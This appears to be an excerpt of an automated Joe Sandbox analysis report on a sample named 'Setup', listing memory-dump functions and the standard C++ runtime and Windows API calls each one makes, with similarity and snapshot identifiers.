                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CAD3
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CAF3
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CB00
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60BCA
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60BD4
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60C25
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60C45
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60C52
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CBA2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CBAC
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CBFD
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CC1D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CC2A
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60B35
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60B3F
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60B90
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60BB0
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60BBD
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6189A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D618A4
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D618F5
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61915
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61922
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6192F
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D61939
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6198A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D619AA
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D619B7
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CE8B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CE95
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CEE6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CF06
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CF13
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60CF4
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60CFE
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60D4F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60D6F
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60D7C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60C5F
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60C69
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D60CBA
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60CDA
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D60CE7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CC37
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CC41
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CC92
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CCB2
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CCBF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CDF6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CE00
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CE51
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CE71
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CE7E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60EB3
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60EBD
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D60EF7
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60F2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 50917705-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60E1E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60E28
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D60E62
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60E99
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 50917705-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60D89
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60D93
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 02D60DCD
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60E04
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3358926169-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: +$-$@PI
                                                                                                                                                                                                                                                      • API String ID: 3732870572-533401412
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D3ED5D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: '@PI$@PI$@PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-2151343152
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D44C2D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: @PI$@PI$@PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-4240548292
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 031C21E2
                                                                                                                                                                                                                                                      • CatchIt.LIBVCRUNTIME ref: 031C22C8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B32E5
                                                                                                                                                                                                                                                        • Part of subcall function 031ACB11: _Maklocchr.LIBCPMT ref: 031ACB7D
                                                                                                                                                                                                                                                        • Part of subcall function 031ACB11: _Maklocchr.LIBCPMT ref: 031ACB90
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 031B337D
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 031B3397
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D64AC9
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E2F5: _Maklocchr.LIBCPMT ref: 02D5E361
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E2F5: _Maklocchr.LIBCPMT ref: 02D5E374
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 02D64B61
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 02D64B7B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 031783C9
                                                                                                                                                                                                                                                        • Part of subcall function 031BF9CE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031766AC,?,?,?,?,031766AC,?,0320384C), ref: 031BFA2E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionIos_base_dtorUserstd::ios_base::_
                                                                                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 02D29BAD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                      • String ID: @vH$XvH$pvH
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(03205040,00000000,00000000,?), ref: 031D262B
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 031D287D
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 031D28C3
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 031D2966
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C75F
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C779
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C9A6
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C9C0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 031D830C
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 031D8313
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 031D834D
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 031D8354
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 02D64CF4
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 02D64D87
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 02D64D97
                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 02D64DB9
